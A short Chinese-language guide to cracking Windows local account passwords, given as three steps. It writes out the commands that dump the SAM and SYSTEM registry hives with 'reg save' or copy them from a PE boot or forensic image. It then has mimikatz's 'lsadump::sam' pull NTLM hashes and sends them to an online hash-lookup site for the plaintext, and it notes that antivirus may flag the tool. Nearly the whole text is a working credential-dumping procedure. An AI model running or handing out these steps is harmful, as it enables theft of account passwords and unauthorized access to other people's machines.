破解Windows本地账户密码(拿到明文密码)
1.导出sam和system文件
以管理员身份运行CMD命令行工具 输入: reg save hklm\sam sam.hive (本机密码) reg save hklm\system system.hive (本机密码) 导出路径为当前目录
PE模式下(win预安装模式)或直接连接硬盘找 C:\windows\system32\config\sam和system文件 取证镜像模式下 找镜像文件下 C:\windows\system32\config\sam和system文件
2.读取sam和system文件获取Hash NTLM加密后的密码
mimikatz(实战工具有被杀的风险)(完整用法自行百度,我也不知道) 把sam.hive system.hive 或 sam system文件放在mimikatz.exe 同一目录下 以管理员身份运行mimikatz.exe 输入: lsadump::sam /sam:sam.hive /system:system.hive 或 lsadump::sam /sam:sam /system:system (主要看导出的sam和system文件是那种方法) 得到Hash NTLM加密后的密码
3.在线网站在线破解密码例如:www.cmd5.com 拿到明文密码
结束